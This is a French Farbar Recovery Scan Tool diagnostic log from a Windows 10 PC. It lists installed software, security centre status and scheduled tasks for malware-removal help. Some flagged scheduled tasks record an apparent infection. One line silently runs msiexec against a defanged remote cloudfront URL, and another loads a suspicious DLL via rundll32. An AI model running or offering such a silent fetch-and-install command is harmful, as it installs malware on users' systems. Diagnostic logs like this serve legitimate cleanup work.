Résultats de l'Analyse supplémentaire de Farbar Recovery Scan Tool (x64) Version: 24-05-2017
Exécuté par Pierre (27-05-2017 18:27:44)
Exécuté depuis C:\Users\Pierre\Desktop
Windows 10 Home Version 1703 (X64) (2017-04-26 21:49:43)
Mode d'amorçage: Normal
==========================================================


==================== Comptes: =============================

Administrateur (S-1-5-21-684585145-4270999654-1484381816-500 - Administrator - Disabled)
DefaultAccount (S-1-5-21-684585145-4270999654-1484381816-503 - Limited - Disabled)
defaultuser0 (S-1-5-21-684585145-4270999654-1484381816-1000 - Limited - Disabled) => C:\Users\defaultuser0
Invité (S-1-5-21-684585145-4270999654-1484381816-501 - Limited - Disabled)
pierr (S-1-5-21-684585145-4270999654-1484381816-1001 - Administrator - Enabled) => C:\Users\pierr
Pierre (S-1-5-21-684585145-4270999654-1484381816-1004 - Administrator - Enabled) => C:\Users\Pierre

==================== Centre de sécurité ========================

(Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé.)

AV: Avast Antivirus (Enabled - Up to date) {8EA8924E-BC81-DC44-8BB0-8BAE75D86EBF}
AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Avast Antivirus (Enabled - Up to date) {35C973AA-9ABB-D3CA-B100-B0DC0E5F2402}

==================== Programmes installés ======================

(Seuls les logiciels publicitaires ('adware') avec la marque 'caché' ('Hidden') sont susceptibles d'être ajoutés au fichier fixlist.txt pour qu'ils ne soient plus masqués. Les programmes publicitaires devront être désinstallés manuellement.)

"Mass Effect 3" (HKLM-x32\...\{46E776B9-37DE-4B71-8DF2-F4C75112CA27}_is1) (Version:  - )
@BIOS B16.1205.1 (HKLM-x32\...\InstallShield_{C9D46F25-5F9D-4E25-B24F-BC00E9EDF529}) (Version: 3.00.0000 - GIGABYTE)
@BIOS B16.1205.1 (x32 Version: 3.00.0000 - GIGABYTE) Hidden
3DOSD (HKLM-x32\...\InstallShield_{F0D1FAA5-F9F8-4524-9B65-A5BFDDD5A29B}) (Version: 1.00.0023 - GIGABYTE)
3DOSD (x32 Version: 1.00.0023 - GIGABYTE) Hidden
Adobe Flash Player 25 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 25.0.0.171 - Adobe Systems Incorporated)
Adobe Flash Player 25 PPAPI (HKLM-x32\...\Adobe Flash Player PPAPI) (Version: 25.0.0.171 - Adobe Systems Incorporated)
Ambient LED (HKLM-x32\...\InstallShield_{BEF97B38-D1B8-45B4-A60A-AF5C1556CC72}) (Version: 1.00.1605.1801 - GIGABYTE)
Ambient LED (x32 Version: 1.00.1605.1801 - GIGABYTE) Hidden
Ansel (Version: 382.05 - NVIDIA Corporation) Hidden
APP Center (HKLM-x32\...\InstallShield_{D50BEE9A-0EC6-4A58-BF90-35BDC6D6495D}) (Version: 1.00.1703.2301 - GIGABYTE)
APP Center (x32 Version: 1.00.1703.2301 - GIGABYTE) Hidden
Armored Warfare MyCom (HKU\S-1-5-21-684585145-4270999654-1484381816-1004\...\Armored Warfare MyCom) (Version: 1.113 - My.com B.V.)
Armored Warfare MyCom PTS (HKU\S-1-5-21-684585145-4270999654-1484381816-1004\...\Armored Warfare MyCom PTS) (Version: 1.57 - My.com B.V.)
Aslain's WoT Modpack version 9.18.0.26 (HKLM-x32\...\Aslains_WoT_Modpack_Installer_is1) (Version: 9.18.0.26 - Aslain)
Avast Antivirus Gratuit (HKLM-x32\...\Avast Antivirus) (Version: 17.4.2294 - AVAST Software)
Battlefield™ 1 (HKLM-x32\...\{335B50BC-6130-4BAF-9A6A-F1561270587B}) (Version: 1.0.47.30570 - Electronic Arts)
BIOS Setup (HKLM-x32\...\InstallShield_{9D48202D-C767-40E7-8A4E-C14BD7328168}) (Version: 1.00.0000 - GIGABYTE)
BIOS Setup (x32 Version: 1.00.0000 - GIGABYTE) Hidden
BUSB (HKLM-x32\...\{0AADC50C-C4F8-49A7-8699-AFE46875CA67}) (Version: 1.16.1020.1 - GIGABYTE)
Call of Duty: Ghosts (HKLM\...\Steam App 209160) (Version:  - Infinity Ward)
CCleaner (HKLM\...\CCleaner) (Version: 5.30 - Piriform)
Cheat Engine 6.6 (HKLM-x32\...\Cheat Engine 6.6_is1) (Version:  - Cheat Engine)
CL-Eye Driver (HKLM-x32\...\CL-Eye Driver) (Version: 5.3.0.0341 - Code Laboratories, Inc.)
Cloud Station (Server) (HKLM-x32\...\InstallShield_{5D132D9D-2A99-48CF-9DCC-775DF6F31384}) (Version: 1.00.1701.1201 - GIGABYTE)
Cloud Station (Server) (x32 Version: 1.00.1701.1201 - GIGABYTE) Hidden
CloudStation (HKLM-x32\...\InstallShield_{6D8DA122-A40A-421B-9D95-FE4C806BCDBE}) (Version: 1.00.0021 - GIGABYTE)
CloudStation (x32 Version: 1.00.0021 - GIGABYTE) Hidden
CPUID CPU-Z 1.79 (HKLM\...\CPUID CPU-Z_is1) (Version:  - )
DAEMON Tools Lite (HKLM\...\DAEMON Tools Lite) (Version: 10.5.1.0230 - Disc Soft Ltd)
devolo Cockpit (HKLM-x32\...\dlancockpit) (Version: 4.3.2.0 - devolo AG)
Discord (HKU\S-1-5-21-684585145-4270999654-1484381816-1004\...\Discord) (Version: 0.0.297 - Hammer & Chisel, Inc.)
EasyTune (HKLM-x32\...\InstallShield_{7F635314-EE21-4E4B-A68D-69AE70BA0E9B}) (Version: 1.16.1117 - GIGABYTE)
EasyTune (x32 Version: 1.16.1117 - GIGABYTE) Hidden
EasyTuneEngineService (HKLM-x32\...\InstallShield_{964575C3-5820-4642-A89A-754255B5EFE1}) (Version: 1.17.0328 - GIGABYTE)
EasyTuneEngineService (x32 Version: 1.17.0328 - GIGABYTE) Hidden
Facebook Gameroom 1.4.1.0 (HKLM-x32\...\{BF83FC65-8072-4850-A4CE-969A5F3570DA}) (Version: 1.4.1.0 - Facebook)
Fast Boot (HKLM-x32\...\InstallShield_{FA8FB4F2-F524-48E1-A06C-45602FBF26CD}) (Version: 1.16.1017 - GIGABYTE)
Fast Boot (x32 Version: 1.16.1017 - GIGABYTE) Hidden
FFB Racing Wheel drivers (HKLM-x32\...\{28B758EA-5C83-48B1-B352-C70F12C73F5A}) (Version: 2.TTRS.2016 - Thrustmaster)
FireStorm version V2.0.0.019 (HKLM-x32\...\FireStorm_is1) (Version: V2.0.0.019 - )
GigabyteFirmwareUpdateUtility (HKLM-x32\...\InstallShield_{1CBA99CE-1AB3-4366-AFB4-7F7B75EBBE35}) (Version: 1.00.0000 - GIGABYTE)
GigabyteFirmwareUpdateUtility (x32 Version: 1.00.0000 - GIGABYTE) Hidden
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 58.0.3029.110 - Google Inc.)
Google Toolbar for Internet Explorer (HKLM-x32\...\{2318C2B1-4965-11d4-9B18-009027A5CD4F}) (Version: 7.5.8231.2252 - Google Inc.)
Google Toolbar for Internet Explorer (x32 Version: 1.0.0 - Google Inc.) Hidden
Google Update Helper (x32 Version: 1.3.33.5 - Google Inc.) Hidden
GService (HKLM-x32\...\{D9CB4282-7B2A-4840-AD1D-9DA72B973DD9}) (Version: 1.16.1116.1 - GIGABYTE)
HP Support Assistant (HKLM-x32\...\{56D27851-B9A6-430F-875A-E2D7A3802C7B}) (Version: 8.4.14.41 - HP Inc.)
HP Support Solutions Framework (HKLM-x32\...\{446AA6E0-104D-40FB-A18A-A3431AED2F14}) (Version: 12.6.14.19 - HP Inc.)
Intel(R) Network Connections 20.7.67.0 (HKLM\...\PROSetDX) (Version: 20.7.67.0 - Intel)
Intel(R) Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 21.20.16.4550 - Intel Corporation)
Java 8 Update 121 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F32180121F0}) (Version: 8.0.1210.13 - Oracle Corporation)
Just Cause 3 (HKLM\...\Steam App 225540) (Version:  - Avalanche Studios)
Logiciel de base du périphérique HP Deskjet 1510 series (HKLM\...\{54C00C25-16ED-4035-BAEC-1C5F9B83B113}) (Version: 32.2.188.47710 - Hewlett-Packard Co.)
Logiciel pour périphérique à chipset Intel® (x32 Version: 10.1.1.9 - Intel(R) Corporation) Hidden
Logiciel Thunderbolt(TM) (HKLM-x32\...\{F55C97BF-D9B2-4BB6-B16A-25A621BC50E9}) (Version: 16.2.52.250 - Intel Corporation)
Malwarebytes version 3.0.6.1469 (HKLM\...\{35065F43-4BB2-439A-BFF7-0F1014F2E0CD}_is1) (Version: 3.0.6.1469 - Malwarebytes)
Mass Effect 2 / RePack by Baracuda (HKLM-x32\...\Mass Effect 2_is1) (Version: 1.2.1604.0 - )
Medal of Honor - Allied Assault War Chest (HKLM-x32\...\Medal of Honor - Allied Assault War Chest_is1) (Version:  - GOG.com)
Microsoft OneDrive (HKU\S-1-5-21-684585145-4270999654-1484381816-1004\...\OneDriveSetup.exe) (Version: 17.3.6816.0313 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{A49F249F-0C91-497F-86DF-B2585E8E76B7}) (Version: 8.0.50727.42 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{6E8E85E8-CE4B-4FF5-91F7-04999C9FAE6A}) (Version: 8.0.50727.42 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 (HKLM-x32\...\{CC1DB186-550F-3CFE-A2A9-EBA5E5A34BC1}) (Version: 9.0.21022 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729 (HKLM-x32\...\{820B6609-4C97-3A2B-B644-573B06A0F0CC}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{d491dd9d-2eda-4d75-b504-1a201436e7fd}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{f9b04b37-35d5-4a19-a51b-fcf4a8734851}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{3994d355-238a-4612-af93-26d13deddef1}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{3bcf8c72-b231-4d28-9f39-3405c22d8b5a}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{b3c7f59f-dc40-4be9-829c-77dd292978ea}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.24215 (HKLM-x32\...\{d992c12e-cab2-426f-bde3-fb8c53950b0d}) (Version: 14.0.24215.1 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.24215 (HKLM-x32\...\{e2803110-78b3-4664-a479-3611a381656a}) (Version: 14.0.24215.1 - Microsoft Corporation)
Mises à jour NVIDIA 25.0.0.0 (Version: 25.0.0.0 - NVIDIA Corporation) Hidden
Mozilla Firefox 53.0.3 (x86 fr) (HKLM-x32\...\Mozilla Firefox 53.0.3 (x86 fr)) (Version: 53.0.3 - Mozilla)
Mozilla Maintenance Service (HKLM\...\MozillaMaintenanceService) (Version: 53.0.2 - Mozilla)
My.com Game Center (HKU\S-1-5-21-684585145-4270999654-1484381816-1004\...\MyComGames) (Version: 3.189 - My.com B.V.)
NVIDIA GeForce Experience 3.6.0.74 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.GFExperience) (Version: 3.6.0.74 - NVIDIA Corporation)
NVIDIA Logiciel système PhysX 9.17.0329 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.17.0329 - NVIDIA Corporation)
NVIDIA Pilote 3D Vision 382.05 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.3DVision) (Version: 382.05 - NVIDIA Corporation)
NVIDIA Pilote audio HD : 1.3.34.26 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_HDAudio.Driver) (Version: 1.3.34.26 - NVIDIA Corporation)
NVIDIA Pilote du contrôleur 3D Vision 369.04 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.NVIRUSB) (Version: 369.04 - NVIDIA Corporation)
NVIDIA Pilote graphique 382.05 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 382.05 - NVIDIA Corporation)
NvNodejs (Version: 3.6.0.74 - NVIDIA Corporation) Hidden
NvTelemetry (Version: 2.4.10.0 - NVIDIA Corporation) Hidden
NvvHci (Version: 2.02.0.5 - NVIDIA Corporation) Hidden
ON_OFF Charge 2 B15.0709.1 (HKLM-x32\...\InstallShield_{6B4ED6F7-BB88-4945-B0C6-01410E1BAC3A}) (Version: 1.00.0000 - GIGABYTE)
ON_OFF Charge 2 B15.0709.1 (x32 Version: 1.00.0000 - GIGABYTE) Hidden
OpenOffice 4.1.3 (HKLM-x32\...\{3E1679DA-5081-44AA-B4C2-BF8EE7E107E0}) (Version: 4.13.9783 - Apache Software Foundation)
Origin (HKLM-x32\...\Origin) (Version: 10.4.2.12697 - Electronic Arts, Inc.)
Panneau de configuration NVIDIA 382.05 (Version: 382.05 - NVIDIA Corporation) Hidden
PlatformPowerManagement (HKLM-x32\...\InstallShield_{7A6EB543-522C-4784-9DB5-4FC87522EBDF}) (Version: 1.16.0331 - GIGABYTE)
PlatformPowerManagement (x32 Version: 1.16.0331 - GIGABYTE) Hidden
Project CARS (HKLM\...\Steam App 234630) (Version:  - Slightly Mad Studios)
RaceRoom Racing Experience  (HKLM\...\Steam App 211500) (Version:  - Sector3 Studios)
RaceRoom Racing Experience Launcher (HKLM-x32\...\{1FD9F07F-7BBF-4C91-B3F0-A23714A3A913}_is1) (Version: 1.0 - Sector3 Studios)
Razer Chroma SDK Core Components (HKLM-x32\...\Razer Chroma SDK) (Version: 1.14.2 - Razer Inc.)
Razer Surround (HKLM-x32\...\Razer Surround) (Version: 1.05.26 - Razer Inc.)
Razer Synapse (HKLM-x32\...\{0D78BEE2-F8FF-4498-AF1A-3FF81CED8AC6}) (Version: 2.20.17.116 - Razer Inc.)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.8004 - Realtek Semiconductor Corp.)
Revo Uninstaller 2.0.2 (HKLM\...\{A28DBDA2-3CC7-4ADC-8BFE-66D7743C6C97}_is1) (Version: 2.0.2 - VS Revo Group, Ltd.)
SafeZone Stable 3.55.2393.596 (x32 Version: 3.55.2393.596 - Avast Software) Hidden
SHIELD Streaming (Version: 7.1.0370 - NVIDIA Corporation) Hidden
SHIELD Wireless Controller Driver (Version: 3.6.0.74 - NVIDIA Corporation) Hidden
SIV (HKLM-x32\...\InstallShield_{AAA057C3-10DC-4EB9-A3D6-8208C1BB7411}) (Version: 1.16.1221 - GIGABYTE)
SIV (x32 Version: 1.16.1221 - GIGABYTE) Hidden
Smart Backup B16.0516.1  (x64) (HKLM-x32\...\{BC1FA5CF-A36F-4C61-9638-09D0B431B006}) (Version: 1.00.0003 - GIGABYTE)
Smart TimeLock B16.0519.1 (HKLM-x32\...\InstallShield_{5D93E30A-78A3-4890-962F-56B61A5873DD}) (Version: 1.00.0001 - GIGABYTE)
Smart TimeLock B16.0519.1 (x32 Version: 1.00.0001 - GIGABYTE) Hidden
SmartKeyboard (HKLM-x32\...\InstallShield_{75B74C36-A9C6-4912-B4BB-C461AA36D01E}) (Version: 1.00.0000 - GIGABYTE)
SmartKeyboard (x32 Version: 1.00.0000 - GIGABYTE) Hidden
Speccy (HKLM\...\Speccy) (Version: 1.30 - Piriform)
Steam (HKLM-x32\...\Steam) (Version: 2.10.91.91 - Valve Corporation)
TeamSpeak 3 Client (HKU\S-1-5-21-684585145-4270999654-1484381816-1004\...\TeamSpeak 3 Client) (Version: 3.1.4 - TeamSpeak Systems GmbH)
TH8 RS Shifter (HKLM-x32\...\{62844C31-8F0A-4417-A944-08CFEE574C3F}) (Version: 1.TH8RS.2015 - Thrustmaster)
VTuner (HKLM-x32\...\InstallShield_{C381226E-C402-4976-9411-54282F1396D3}) (Version: 1.17.0103 - GIGABYTE)
VTuner (x32 Version: 1.17.0103 - GIGABYTE) Hidden
Vulkan Run Time Libraries 1.0.42.1 (HKLM\...\VulkanRT1.0.42.1) (Version: 1.0.42.1 - LunarG, Inc.)
Windows 10 Update and Privacy Settings (HKLM\...\{293F2009-0145-450B-B4AA-063D43FB368C}) (Version: 1.0.13.0 - Microsoft Corporation)
WinRAR 5.40 (64-bit) (HKLM\...\WinRAR archiver) (Version: 5.40.0 - win.rar GmbH)
World of Tanks (HKU\S-1-5-21-684585145-4270999654-1484381816-1004\...\{1EAC1D02-C6AC-4FA6-9A44-96258C37C812eu}_is1) (Version:  - Wargaming.net)
ZebHelpProcess 2016 (HKLM-x32\...\ZebHelpProcess_is1) (Version: 2015 - Nicolas Coolman)
ZHPFix 2015 (HKLM-x32\...\ZHPFix_is1) (Version: 2015 - Nicolas Coolman)

==================== Personnalisé CLSID (Avec liste blanche): ==========================

(Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le fichier ne sera pas déplacé, sauf s'il est inscrit séparément.)

CustomCLSID: HKU\S-1-5-21-684585145-4270999654-1484381816-1004_Classes\CLSID\{087B3AE3-E237-4467-B8DB-5A38AB959AC9}\InprocServer32 -> C:\Program Files (x86)\OpenOffice 4\program\shlxthdl\shlxthdl_x64.dll (Apache Software Foundation)
CustomCLSID: HKU\S-1-5-21-684585145-4270999654-1484381816-1004_Classes\CLSID\{3B092F0C-7696-40E3-A80F-68D74DA84210}\InprocServer32 -> C:\Program Files (x86)\OpenOffice 4\program\shlxthdl\shlxthdl_x64.dll (Apache Software Foundation)
CustomCLSID: HKU\S-1-5-21-684585145-4270999654-1484381816-1004_Classes\CLSID\{63542C48-9552-494A-84F7-73AA6A7C99C1}\InprocServer32 -> C:\Program Files (x86)\OpenOffice 4\program\shlxthdl\shlxthdl_x64.dll (Apache Software Foundation)
CustomCLSID: HKU\S-1-5-21-684585145-4270999654-1484381816-1004_Classes\CLSID\{7BC0E710-5703-45BE-A29D-5D46D8B39262}\InprocServer32 -> C:\Program Files (x86)\OpenOffice 4\program\shlxthdl\ooofilt_x64.dll (Apache Software Foundation)
CustomCLSID: HKU\S-1-5-21-684585145-4270999654-1484381816-1004_Classes\CLSID\{AE424E85-F6DF-4910-A6A9-438797986431}\InprocServer32 -> C:\Program Files (x86)\OpenOffice 4\program\shlxthdl\propertyhdl_x64.dll (Apache Software Foundation)
CustomCLSID: HKU\S-1-5-21-684585145-4270999654-1484381816-1004_Classes\CLSID\{C52AF81D-F7A0-4AAB-8E87-F80A60CCD396}\InprocServer32 -> C:\Program Files (x86)\OpenOffice 4\program\shlxthdl\shlxthdl_x64.dll (Apache Software Foundation)

==================== Tâches planifiées (Avec liste blanche) =============

(Si un élément est inclus dans le fichier fixlist.txt, il sera supprimé du Registre. Le fichier ne sera pas déplacé, sauf s'il est inscrit séparément.)

Task: {04A1735C-C295-4DC6-98CB-C887E836D9BC} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2017-01-21] (Google Inc.)
Task: {0F99C67F-6FCC-45D9-91EA-9D49C7F47A6E} - System32\Tasks\Milimili => C:\Program Files (x86)\MIO\MIO.exe [2017-05-27] () <==== ATTENTION
Task: {1953BCBB-36CB-4A45-8B8A-F4CDD53B5807} - System32\Tasks\NvNodeLauncher_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\NvNode\nvnodejslauncher.exe [2017-05-03] (NVIDIA Corporation)
Task: {21308E1A-658B-49C5-A366-D9B36B822151} - System32\Tasks\NvProfileUpdaterOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [2017-05-03] (NVIDIA Corporation)
Task: {22BD96A8-CFBC-4A60-9A43-5F4E4ED99C95} - System32\Tasks\NVIDIA GeForce Experience SelfUpdate_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\NVIDIA GeForce Experience\NVIDIA GeForce Experience.exe [2017-05-03] (NVIDIA Corporation)
Task: {31FC7509-6360-4D86-BEBF-837B485FD060} - System32\Tasks\Hewlett-Packard\HP Active Health\HP Active Health Scan (HPSA) => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPActiveHealth\ActiveHealth.exe [2016-11-07] (HP Inc.)
Task: {33560A75-B84C-4870-A7D5-4482B86BAE00} - System32\Tasks\HPCeeScheduleForPierre => C:\Program Files (x86)\Hewlett-Packard\HP Ceement\HPCEE.exe [2016-05-12] (HP Development Company, L.P.)
Task: {4FF6235C-BBA1-49CA-975C-20D5DB230A11} - System32\Tasks\FlexiDEN-WX => Rundll32.exe "C:\Program Files\FlexiDEN-WX\FlexiDEN-WX.dll",pMjulPiBr
Task: {555F3361-7031-461F-843C-9E5CAB463D74} - System32\Tasks\Adobe Flash Player PPAPI Notifier => C:\WINDOWS\SysWOW64\Macromed\Flash\FlashUtil32_25_0_0_171_pepper.exe [2017-05-09] (Adobe Systems Incorporated)
Task: {57F19D2F-E680-4402-A0EE-142208869124} - System32\Tasks\NvTmRep_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmRep.exe [2017-05-03] (NVIDIA Corporation)
Task: {59C0BA0E-DAD3-4B9E-9CDC-FA35C7D7D301} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Solutions Framework Report => C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\Modules\HPSFReport.exe [2016-12-21] (HP Inc.)
Task: {5FE3238D-0C6F-4959-AD00-752CD09E52FA} - System32\Tasks\Microsoft\Windows\DeviceSettings\Prerpplifuge => msiexec.exe /i hxxp://D2bUH1bF1g584W.clOuDfroNt.net/mmtsk/occup.php?p=ST2000DM001-1CH164_Z240K0XDXXXXZ240K0XD&amp;d=20170513 /q <==== ATTENTION
Task: {631145E9-A334-49EF-94B9-EC8F76465EC7} - System32\Tasks\Intel\Thunderbolt\Start Thunderbolt application when hardware is detected => ConditionalAppStarter.exe 
Task: {650947FC-59CD-41AC-AA96-01F4A2C021E5} - System32\Tasks\Hewlett-Packard\HP Support Assistant\PC Health Analysis => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe [2017-04-07] (HP Inc.)
Task: {70859D1A-E349-4593-A908-FFCD20F914EB} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2017-01-21] (Google Inc.)
Task: {7690C572-F6CF-4F22-B497-EAC5C3F6A208} - System32\Tasks\NvDriverUpdateCheckDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [2017-05-03] (NVIDIA Corporation)
Task: {7F129B74-4F4B-4A32-A4A8-48D6FC62CE36} - System32\Tasks\NvTmMon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmMon.exe [2017-05-03] (NVIDIA Corporation)
Task: {85D73239-54DF-4DD8-AA43-2773405091C3} - System32\Tasks\cFos\Registration Tasks\Open Browser => Chrome.exe "hxxp://localhost:1487/cfosspeed/console.htm"
Task: {87764114-7D8B-410F-8E87-312C17AB8773} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Solutions Framework Updater - Resources => C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\Modules\HPSSFUpdater.exe [2016-12-07] (HP Inc.)
Task: {90EA2BDB-5486-47D0-A0D2-A6A2B43339B9} - System32\Tasks\SafeZone scheduled Autoupdate 1495884875 => C:\Program Files\AVAST Software\SZBrowser\launcher.exe [2017-03-22] (Avast Software)
Task: {952714F2-6089-4B0B-90D5-40FA4B4385F5} - System32\Tasks\Hewlett-Packard\HP Support Assistant\Product Configurator => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\ProductConfig.exe [2017-04-01] (HP Inc.)
Task: {A88E5752-4DB7-4E39-83DD-632A3433F262} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2017-05-05] (Piriform Ltd)
Task: {B0656336-1135-48C4-995F-3C2AC041BD05} - \{0C0A0F47-797E-7A78-7D11-090F0E7A110D} -> Pas de fichier <==== ATTENTION
Task: {B2AFAA01-36A1-4B4E-A1A2-083AA482D765} - System32\Tasks\Hewlett-Packard\HP Support Assistant\WarrantyChecker_DeviceScan => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPWarrantyCheck\HPWarrantyChecker.exe [2017-04-06] (HP Inc.)
Task: {B60CFE46-6B46-4567-8F4B-D08538227220} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWoW64\Macromed\Flash\FlashPlayerUpdateService.exe [2017-05-09] (Adobe Systems Incorporated)
Task: {D09677CC-A898-470D-9D53-090EF20C7F2C} - System32\Tasks\Intel\Thunderbolt\Start Thunderbolt application on login if service is up => ConditionalAppStarter.exe 
Task: {DA3DD793-031A-4619-936F-E95BC1B72A80} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Solutions Framework Updater => C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\Modules\HPSSFUpdater.exe [2016-12-07] (HP Inc.)
Task: {DC99CB21-A469-4429-8108-D5F7D470A66D} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Assistant Quick Start => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe [2017-04-07] (HP Inc.)
Task: {F0323BE2-8DB1-490B-8F14-88AD25808C9F} - System32\Tasks\NvProfileUpdaterDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [2017-05-03] (NVIDIA Corporation)
Task: {F0A64365-1659-4723-8556-39EEC44AF787} - System32\Tasks\Avast Emergency Update => C:\Program Files\AVAST Software\Avast\AvEmUpdate.exe [2017-05-27] (AVAST Software)
Task: {F9BAB37E-8830-40D2-B7C3-43784CA878D9} - System32\Tasks\Intel\Thunderbolt\Start Thunderbolt service when hardware is detected => sc.exe start ThunderboltService
Task: {FBC45382-4B1F-4E8C-BDD9-666E8445DCD9} - System32\Tasks\Intel\Thunderbolt\Start Thunderbolt service on boot if driver is up => tbtsvc.exe 
Task: {FFC162A3-5710-4253-A8A1-490E934E857C} - System32\Tasks\NvTmRepOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmRep.exe [2017-05-03] (NVIDIA Corporation)

(Si un élément est inclus dans le fichier fixlist.txt, le fichier tâche (.job) sera déplacé. Le fichier exécuté par la tâche ne sera pas déplacé.)

Task: C:\WINDOWS\Tasks\HPCeeScheduleForPierre.job => C:\Program Files (x86)\Hewlett-Packard\HP Ceement\HPCEE.exe

==================== Raccourcis =============================

(Les éléments sont susceptibles d'être inscrits dans le fichier fixlist.txt afin d'être supprimés ou restaurés.)

Shortcut: C:\Users\Pierre\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\69639df789022856\Pierre - Chrome.lnk -> C:\Users\Pierre\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\69639df789022856 ()

